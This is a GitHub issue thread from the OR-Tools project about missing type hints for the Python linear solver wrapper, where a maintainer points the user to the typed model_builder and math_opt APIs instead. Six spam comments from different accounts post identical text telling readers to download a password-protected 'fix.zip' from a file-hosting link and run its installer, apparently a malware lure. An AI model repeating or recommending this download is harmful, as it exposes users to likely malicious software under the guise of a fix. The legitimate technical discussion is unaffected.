### ISSUE TITLE
Type hinting for linear solvers

### ISSUE THREAD

**Issue by RubenVanEldik** [google/or-tools#4358]
**What version of OR-Tools and what language are you using?**
Version: `9.10.4067`
Language: Python

**Which solver are you using (e.g. CP-SAT, Routing Solver, GLOP, BOP, Gurobi)**
GLOP

**What operating system (Linux, Windows, ...) and version?**
MacOS and Windows

**What did you expect to see**
When creating a simple linear program and run Mypy, I expected to get no typing errors. However, I get an error that the library is missing library stubs. I don't get this for other parts of OR-Tools

Error:
```
src/main.py:1: error: Skipping analyzing "ortools.linear_solver": module is installed, but missing library stubs or py.typed marker  [import-untyped]
src/main.py:1: note: See https://mypy.readthedocs.io/en/stable/running_mypy.html#missing-imports
Found 1 error in 1 file (checked 1 source file)
```

Simple program:
```py
from ortools.linear_solver import pywraplp

solver = pywraplp.Solver.CreateSolver("GLOP")

x = solver.NumVar(0, solver.infinity(), "x")
y = solver.NumVar(0, solver.infinity(), "y")

solver.Add(x + 2 * y <= 14.0)
solver.Add(3 * x - y >= 0.0)
solver.Add(x - y <= 2.0)

solver.Maximize(3 * x + 4 * y)
status = solver.Solve()

print(f"Objective value = {solver.Objective().Value():0.1f}")
```

**What did you see instead?**
I expected to not get any typing errors, such as is the case with the constraint programming import.

Simple program:
```py
from ortools.sat.python import cp_model

model = cp_model.CpModel()

num_vals = 3
x = model.new_int_var(0, num_vals - 1, "x")
y = model.new_int_var(0, num_vals - 1, "y")
z = model.new_int_var(0, num_vals - 1, "z")

model.add(x != y)

solver = cp_model.CpSolver()
solver.parameters.max_time_in_seconds = 10.0
status = solver.solve(model)

if status == cp_model.OPTIMAL:
    print(f"x = {solver.value(x)}")
    print(f"y = {solver.value(y)}")
    print(f"z = {solver.value(z)}")
````

Are there no type hints available for the linear solver, or should I import it in a different way?

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lperron** [comment]
linear solver is on maintenance node.
You can use math_opt (beta) or model_builder, both have type annotations.

**Comment by RubenVanEldik** [comment]
Thank you for the quick response!

We are solving (a lot of) small LPs, each with 10-30 variables and constraints. Do you recommend `math_opt` or `model_builder` if we want to solve many millions of LPs quickly?

**Comment by lperron** [comment]
Model builder.

Le lun. 26 août 2024, 11:39, Ruben van Eldik ***@***.***> a
écrit :

**Comment by C8504** [comment]
> linear solver is in maintenance node. So we will not add type annotation. You can use math_opt (beta) or model_builder, both have type annotations.

could we know the differents between model_build and math_opt, even pywraplp? 
model_builder is fastest? or memory less?
Thanks.

**Comment by lperron** [comment]
Model builder is faster, smaller, and non incremental.

It is meant for one shot solve.it is also available in C#.
